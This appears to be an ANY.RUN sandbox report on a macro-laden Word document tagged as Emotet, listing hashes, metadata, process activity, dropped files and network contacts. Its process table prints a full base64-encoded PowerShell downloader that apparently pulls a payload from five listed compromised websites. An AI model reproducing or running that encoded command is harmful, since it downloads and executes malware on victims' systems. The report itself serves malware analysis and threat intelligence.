analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

7cfb222a4e97e5ec87f4d2c6d0a8913ed3ccae3a3861507c98e78269b724875c.doc

Full analysis: https://app.any.run/tasks/c7bbc189-3ba8-4634-9b73-943283758c39
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 19:19:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: CSS, Subject: program, Author: Johnnie Mosciski, Keywords: Sleek Soft Soap, Comments: 24 hour, Template: Normal.dotm, Last Saved By: Wyman Swift, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 06:52:00 2019, Last Saved Time/Date: Mon Oct 14 06:52:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0
MD5:

B613A11097843DDBB5ABECF23E2808E5

SHA1:

A9F53D866F76C480230F462C3384434310D09FED

SHA256:

7CFB222A4E97E5EC87F4D2C6D0A8913ED3CCAE3A3861507C98E78269B724875C

SSDEEP:

6144:Tg39prLKUzSFnLx3/hvbrptZI141ekKGQ2:Tg39prGUGFt3l3TZ5ej

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 1740)
    • PowerShell script executed

      • powershell.exe (PID: 1740)
    • Creates files in the user directory

      • powershell.exe (PID: 1740)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2660)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2660)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: CSS
Subject: program
Author: Johnnie Mosciski
Keywords: Sleek Soft Soap
Comments: 24 hour
Template: Normal.dotm
LastModifiedBy: Wyman Swift
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:10:14 05:52:00
ModifyDate: 2019:10:14 05:52:00
Pages: 1
Words: 30
Characters: 172
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Sipes, Schowalter and Koch
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 201
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Sporer
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2660"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\7cfb222a4e97e5ec87f4d2c6d0a8913ed3ccae3a3861507c98e78269b724875c.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1740powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABkAGUAMwA3ADkAOQA3AGUAMwBjADEAMAA1ADcAMQA9ACcAYQAwAHgAMwBmADgAYgBjADcAMAA3ADEAZAAwAGQAJwA7ACQAYQAwAHgAYgA3ADUANABhADQAMAAxAGUANwBmADkAYgA0ACAAPQAgACcAOQA0ADkAJwA7ACQAYQAwAHgANgBmADYAMwBlADAAZAA4ADIAMAA3ADAAZAAyAD0AJwBhADAAeAA3ADYAZgBkADgANQA4ADYAMQA2ADIAZgA4AGIAJwA7ACQAYQAwAHgAOAAyAGIAOABkAGMANABiADEANwAxAGMAMwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAYgA3ADUANABhADQAMAAxAGUANwBmADkAYgA0ACsAJwAuAGUAeABlACcAOwAkAGEAMAB4ADAANABiADAAZgAzADMAZgBlAGEAZAA9ACcAYQAwAHgAYgA5AGUANwA1ADYAYQBlADYAZgAnADsAJABhADAAeABjAGMANQBkADAANwAxADUAYQAxADIAZQA3AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABhADAAeABiADAAZgAxADIAZQBmADgAZgBiADUAZgA9ACcAaAB0AHQAcAA6AC8ALwB0AGUAbgBkAGUAbgBjAGkAYQBzAHYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADEAZAA5ADcAMgBhAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYwBvAHIAcgBlAGwAYQB0AGkAbwBuAC4AYwBhAC8AZgBvAG4AdABzAC8ARgBTAEsAcgBZAE8AYwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBuAGUAeQBoAGEAaQByAHAAYQByAHQAeQAuAGMAbwBtAC8AYwBsAGEAcwBzAC4AbABvAGMAYQBsAC8AcABhAHIAdABzAF8AcwBlAHIAdgBpAGMAZQAvAHMANAB5ADAALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGkAdgBpAG4AZQBkAG8AbABsAHoAYwBvAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGcAcgBhAGQAZQAvAGsAYwBiAGcALwAqAGgAdAB0AHAAOgAvAC8AZABuAGMAdgBpAGUAdABuAGEAbQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANABiAHYANAB6ADcAdQAvACcALgAiAFMAYABwAEwAaQBUACIAKAAnACoAJwApADsAJABhADAAeAA3AGUAZABmADYAOQA3ADAAOQA3AGYAYwAzADIAMAA9ACcAYQAwAHgAOAAwADIANgBkADMAOAAzADUAYwAxAGEANABhADkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGEAMAB4ADAAZAAyAGMAOABlADMAMQA0AGEAMAAgAGkAbgAgACQAYQAwAHgAYgAwAGYAMQAyAGUAZgA4AGYAYgA1AGYAKQB7AHQAcgB5AHsAJABhADAAeABjAGMANQBkADAANwAxADUAYQAxADIAZQA3AC4AIgBkAG8AYAB3AGAATgBgAGwATwBBAGQARgBpAEwARQAiACgAJABhADAAeAAwAGQAMgBjADgAZQAzADEANABhADAALAAgACQAYQAwAHgAOAAyAGIAOABkAGMANABiADEANwAxAGMAMwApADsAJABhADAAeABiADAAMABhADcAZQBjAGIAZgA3ADgAOAAzAD0AJwBhADAAeAA3ADEAOAA3AGQAYgBhAGEANQBjACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAYQAwAHgAOAAyAGIAOABkAGMANABiADEANwAxAGMAMwApAC4AIgBsAEUAYABOAGcAdABoACIAIAAtAGcAZQAgADMANgA1ADkAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAFIAdAAiACgAJABhADAAeAA4ADIAYgA4AGQAYwA0AGIAMQA3ADEAYwAzACkAOwAkAGEAMAB4ADUAYwA1AGUAMQA3AGYAZAAzADEAPQAnAGEAMAB4AGEAZABjAGYAYgAyADUAMwAyADMAMgAxADEANgAxACcAOwBiAHIAZQBhAGsAOwAkAGEAMAB4AGUANgAxADcANQBhAGEAMgBhADEAZgBmAGEAZQA9ACcAYQAwAHgANwAwAGMAZAA1ADEAZQA3ADEAMwAyADkAMwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADAAeAA1ADgAMgA0AGEAZgBlADUAMwAxAGQAMQAwADYANAA9ACcAYQAwAHgAYQBiADkANQA0ADkANgBkADcAYQA1ADEAOAAxACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 876
Read events
1 083
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7F2.tmp.cvr
MD5:
SHA256:
1740powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V9FMY44ZJX6UGURFXBY7.temp
MD5:
SHA256:
2660WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC985955.wmfwmf
MD5:5F6A5230B31FE7E16E1BF428DA36186B
SHA256:C81180A9C124061F19A41ABBC1CDEC81B8182FCDB26240A222FB88684B01471F
2660WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A2E50F9.wmfwmf
MD5:E9EA0224A0B59683F7F913B80FC4C68B
SHA256:96116C45AEAB440DC68095A682D4F2F7F81CD465B400FD6F847A03721BE80072
2660WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA798ED8.wmfwmf
MD5:E68EE2852AA1830F259E98F70AB65B66
SHA256:085A291D0FE90E2E97FC4E548916BE37288E17116EC8120E124A1FE73E70BECF
2660WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36C4D373.wmfwmf
MD5:AC07EEC2DBF71D4064CA3F9F20D0A086
SHA256:D0EE5067835E5A1292E2805A6FDE4F8652D5287890B2651D366DCCA67247C965
2660WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\633E566F.wmfwmf
MD5:E6CC30CFFCBBFCDEAA6486310C5F1A23
SHA256:4C501A29AF5C6ACD9C3C63874C011A712B24A0108D89E68735A2C1EE0B1F39C9
2660WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90EE52A6.wmfwmf
MD5:7072FC3981FACAB89652F8EC8D085FB3
SHA256:16C4AF060AF9BAC73DCF151B6C2013BE7198AAC0813A1125BA990B85564DA029
2660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:D3EBFE577A9E5C0557E4EBD716FD1665
SHA256:B524ABBCCF23E897595B6C25CA4F696628A119623F491796A89D77F311635EE0
2660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$fb222a4e97e5ec87f4d2c6d0a8913ed3ccae3a3861507c98e78269b724875c.docpgc
MD5:7764119855872AE04C1213CED80CDE79
SHA256:602DABD291E14E352CE988E37190BF163A0307B72131D1197C9B33932BBD5A65
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1740
powershell.exe
GET
404
192.155.90.244:80
http://www.moneyhairparty.com/class.local/parts_service/s4y0/
US
xml
345 b
unknown
1740
powershell.exe
GET
404
69.42.58.144:80
http://www.correlation.ca/fonts/FSKrYOc/
CA
xml
345 b
suspicious
1740
powershell.exe
GET
404
149.56.222.236:80
http://tendenciasv.com/wp-admin/1d972a/
CA
xml
345 b
suspicious
1740
powershell.exe
GET
404
45.56.101.4:80
http://www.divinedollzco.com/wp-content/upgrade/kcbg/
US
xml
345 b
unknown
1740
powershell.exe
GET
404
45.119.83.237:80
http://dncvietnam.com/wp-includes/4bv4z7u/
VN
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1740
powershell.exe
45.56.101.4:80
www.divinedollzco.com
Linode, LLC
US
unknown
1740
powershell.exe
69.42.58.144:80
www.correlation.ca
Peer 1 Network (USA) Inc.
CA
suspicious
1740
powershell.exe
149.56.222.236:80
tendenciasv.com
OVH SAS
CA
suspicious
1740
powershell.exe
192.155.90.244:80
www.moneyhairparty.com
Linode, LLC
US
unknown
1740
powershell.exe
45.119.83.237:80
dncvietnam.com
Long Van System Solution JSC
VN
malicious

DNS requests

Domain
IP
Reputation
tendenciasv.com
  • 149.56.222.236
suspicious
www.correlation.ca
  • 69.42.58.144
suspicious
www.moneyhairparty.com
  • 192.155.90.244
unknown
www.divinedollzco.com
  • 45.56.101.4
unknown
dncvietnam.com
  • 45.119.83.237
malicious

Threats

No threats detected
No debug info